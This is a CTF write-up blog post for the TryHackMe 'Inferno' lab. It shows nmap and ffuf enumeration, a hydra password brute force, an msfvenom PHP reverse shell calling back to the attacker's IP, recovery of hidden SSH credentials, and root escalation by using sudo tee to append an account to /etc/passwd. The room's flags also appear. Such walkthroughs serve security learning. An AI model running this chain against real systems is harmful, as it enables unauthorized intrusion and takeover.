---
layout: post
title: "Inferno - Write-up - TryHackMe"
lang: en
categories:
  - writeups
tags:
  - security
  - writeups
  - web
  - thm
  - php
  - eop
  - webshell
  - sudo
date: 2021/02/16 19:50:00
thumbnail: /images/TryHackMe/inferno.png
authorId: noraj
toc: true
---
# Information

## Room

- **Name:** Inferno
- **Profile:** [tryhackme.com](https://tryhackme.com/room/inferno)
- **Difficulty:** Medium
- **Description**: Real Life machine vs CTF. The machine is designed to be real-life and is perfect for newbies starting out in penetration testing 

![Inferno](/images/TryHackMe/inferno.png)

# Write-up

## Overview

Install tools used in this WU on BlackArch Linux:

```
$ sudo pacman -S nmap ffuf cewl hydra metasploit ruby-ctf-party gtfoblookup
```

## Network enumeration

Port scan with nmap:

```
$ # Nmap 7.91 scan initiated Sat Feb 13 15:05:33 2021 as: nmap -sSVC -p- -v -oA nmap_scan 10.10.68.164
Nmap scan report for 10.10.68.164
Host is up (0.032s latency).
Not shown: 65479 closed ports
PORT      STATE SERVICE           VERSION
22/tcp    open  ssh               OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d7:ec:1a:7f:62:74:da:29:64:b3:ce:1e:e2:68:04:f7 (RSA)
|   256 de:4f:ee:fa:86:2e:fb:bd:4c:dc:f9:67:73:02:84:34 (ECDSA)
|_  256 e2:6d:8d:e1:a8:d0:bd:97:cb:9a:bc:03:c3:f8:d8:85 (ED25519)
80/tcp    open  http              Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Dante's Inferno
...
```

There is only 22 and 80 truly open, other ports are trolls.

## Web enumeration

Enumerating files and folders on the website gave nothing.

```plaintext
$ ffuf -u http://10.10.68.164/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt -fc 403
$ ffuf -u http://10.10.68.164/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt -fc 403
```

## Web bruteforce

But manually trying the name of the box (http://10.10.68.164/inferno) gave me
a basic auth restricted area.

I tried some common credentials combination including `dante` and `inferno`
without success. So let's try to build a wordlist based on words of the page.

```plaintext
$ cewl -d 0 -w $(pwd)/words.txt http://10.10.68.164/
```

We'll use those words as password.

As a user list we'll try:

```plaintext
admin
dante
inferno
```

Then let's try those wordlists on the basic auth area:

```
$ hydra -L users.txt -P words.txt -f 10.10.68.164 http-get /inferno
```

This educated guess was too smart and did not gave any results.

Then in just tried the user admin and common passwords:

```
$ hydra -l admin -P /usr/share/wordlists/passwords/rockyou.txt -f 10.10.68.164 http-get /inferno
...
[80][http-get] host: 10.10.68.164   login: admin   password: dante1
[STATUS] attack finished for 10.10.68.164 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
```

We can access http://10.10.68.164/inferno/ with `admin` / `dante1` but behind
that there is just a login form.

Using the same credentials over the login form just works.

This let us access to a file system browser and editor.

## Web exploitation

The web app also let us the ability to directly upload a file, so we can
generate a php reverse shell.

```plaintext
$ msfvenom -p php/meterpreter_reverse_tcp LHOST=10.9.19.77 LPORT=9999 -f raw > noraj.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 34277 bytes
```

But upload or file edition seems not to work and being only in read only mode.

The only folder were upload was possible is
`/inferno/themes/default/filemanager/images/codiad/manifest/files/codiad/example/INF/`.

Let's trigger our reverse shell at http://10.10.41.191/inferno/themes/default/filemanager/images/codiad/manifest/files/codiad/example/INF/agent.php

```plaintext
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.9.19.77:9999
[*] Meterpreter session 1 opened (10.9.19.77:9999 -> 10.10.139.220:39444) at 2021-02-14 18:11:25 +0100

meterpreter > shell
Process 1890 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

## System enumeration

Let's find text files:

```
$ find /home/dante -name *.txt -type f 2>/dev/null
/home/dante/Desktop/inferno.txt
/home/dante/Desktop/purgatorio.txt
/home/dante/Desktop/paradiso.txt
/home/dante/local.txt
```

Those are not text files but binaries:

```
$ file /home/dante/Desktop/*
/home/dante/Desktop/inferno.txt:    ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=864c9bbef111ce358b3452cf7ea457d292ba93f0, stripped
/home/dante/Desktop/paradiso.txt:   ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=7516179fdf8ec3353673a8abcfdf0b60ec2c3b8f, stripped
/home/dante/Desktop/purgatorio.txt: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=003dbfa8e3bce6203f5b7d410020af2442937db6, stripped
```

Again those are troll files, there a others in Documents or Downloads.

But in Downloads there is a hidden file: `/home/dante/Downloads/.download.dat`.

## Elevation of Privilege (EoP): from www-data to dante

It's containing a hexadecimal string so I used [ctf-party][ctf-party]
to decode it.

1. Remove spaces
2. Decode from hex to string using [ctf-party][ctf-party]
3. Split after each line feed
4. Keep only the last element

```ruby
$ ctf_party_console
irb(main):005:0> 'c2 ab 4f 72 20 73 65 e2 80 99 20 74 75 20 71 75 65 6c 20 56 69 72 67 69 6c 69 6f 20 65 20 71 75 65 6c 6c 61 20 66 6f 6e 74 65 0a 63 68 65 20 73 70 61 6e 64 69 20 64 69 20 70 61 72 6c 61 72 20 73 c3 ac 20 6c 61 72 67 6f
 20 66 69 75 6d 65 3f c2 bb 2c 0a 72 69 73 70 75 6f 73 e2 80 99 69 6f 20 6c 75 69 20 63 6f 6e 20 76 65 72 67 6f 67 6e 6f 73 61 20 66 72 6f 6e 74 65 2e 0a 0a c2 ab 4f 20 64 65 20 6c 69 20 61 6c 74 72 69 20 70 6f 65 74 69 20 6f 6e 6f 72 6
5 20 65 20 6c 75 6d 65 2c 0a 76 61 67 6c 69 61 6d 69 20 e2 80 99 6c 20 6c 75 6e 67 6f 20 73 74 75 64 69 6f 20 65 20 e2 80 99 6c 20 67 72 61 6e 64 65 20 61 6d 6f 72 65 0a 63 68 65 20 6d e2 80 99 68 61 20 66 61 74 74 6f 20 63 65 72 63 61
72 20 6c 6f 20 74 75 6f 20 76 6f 6c 75 6d 65 2e 0a 0a 54 75 20 73 65 e2 80 99 20 6c 6f 20 6d 69 6f 20 6d 61 65 73 74 72 6f 20 65 20 e2 80 99 6c 20 6d 69 6f 20 61 75 74 6f 72 65 2c 0a 74 75 20 73 65 e2 80 99 20 73 6f 6c 6f 20 63 6f 6c 75
 69 20 64 61 20 63 75 e2 80 99 20 69 6f 20 74 6f 6c 73 69 0a 6c 6f 20 62 65 6c 6c 6f 20 73 74 69 6c 6f 20 63 68 65 20 6d e2 80 99 68 61 20 66 61 74 74 6f 20 6f 6e 6f 72 65 2e 0a 0a 56 65 64 69 20 6c 61 20 62 65 73 74 69 61 20 70 65 72 2
0 63 75 e2 80 99 20 69 6f 20 6d 69 20 76 6f 6c 73 69 3b 0a 61 69 75 74 61 6d 69 20 64 61 20 6c 65 69 2c 20 66 61 6d 6f 73 6f 20 73 61 67 67 69 6f 2c 0a 63 68 e2 80 99 65 6c 6c 61 20 6d 69 20 66 61 20 74 72 65 6d 61 72 20 6c 65 20 76 65
6e 65 20 65 20 69 20 70 6f 6c 73 69 c2 bb 2e 0a 0a 64 61 6e 74 65 3a 56 31 72 67 31 6c 31 30 68 33 6c 70 6d 33 0a'.gsub(' ', '').from_hex.split("\n").last
=> "dante:V1rg1l10h3lpm3"
```

Note: The guys that imported this box from Vulnhub to TryHackMe claimed it was
realistic and it's totally CTF-like.

## Elevation of Privilege (EoP): from dante to root

Let's connect with the creds to SSH.

```
$ ssh dante@10.10.139.220
dante@Inferno:~$ id
uid=1000(dante) gid=1000(dante) groups=1000(dante),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev)
```

In version 1.1 [of Inferno](https://www.vulnhub.com/entry/inferno-11,603/) there
is even more trolls and guessing than in the v1.0.
For example when you spawn a PTY an `exit` command is automatically executed
after 1 minute, on SSH a `logout` is automatically executed after 5 seconds.

User flag: {% spoiler 77f6f3c544ec0811e2d1243e2e0d1835 %}

```
dante@Inferno:~$ sudo -l
Matching Defaults entries for dante on Inferno:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User dante may run the following commands on Inferno:
    (root) NOPASSWD: /usr/bin/tee
```

Let's check how we can exploit tee.

```plaintext
$ gtfoblookup linux sudo tee
tee:

    sudo:

        Code: LFILE=file_to_write
              echo DATA | sudo tee -a "$LFILE"
```

Lets do that to write a password to a new admin account in `/etc/passwd`:

```plaintext
dante@Inferno:~$ LFILE=/etc/passwd

dante@Inferno:~$ echo "noraj:$(openssl passwd -6 -salt noraj password):0:0:noraj:/root:/bin/bash" | sudo tee -a "$LFILE"
noraj:$6$noraj$0xd4tNtgvg16YDhJVioiZDy5VDEtbXUsXxXLTM0tfg5AuoIAaslp87j7GlfjoMWnt2kJdYc2.2q8JbilrVOip/:0:0:noraj:/root:/bin/bash

dante@Inferno:~$ tail /etc/passwd
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
dante:x:1000:1000:dante:/home/dante:/bin/bash
$6$noraj$0xd4tNtgvg16YDhJVioiZDy5VDEtbXUsXxXLTM0tfg5AuoIAaslp87j7GlfjoMWnt2kJdYc2.2q8JbilrVOip/
noraj:$6$noraj$0xd4tNtgvg16YDhJVioiZDy5VDEtbXUsXxXLTM0tfg5AuoIAaslp87j7GlfjoMWnt2kJdYc2.2q8JbilrVOip/:0:0:noraj:/root:/bin/bash

dante@Inferno:~$ su noraj
Password:

root@Inferno:/home/dante# cat /root/
.bash_history  .bashrc        .config/       .local/        .profile       proof.txt      .ssh/

root@Inferno:/home/dante# cat /root/proof.txt
Congrats!

You've rooted Inferno!

edited

mindsflee
```

Root flag: {% spoiler f332678ed0d0767d7434b8516a7c6144 %}

[ctf-party]:https://github.com/noraj/ctf-party/
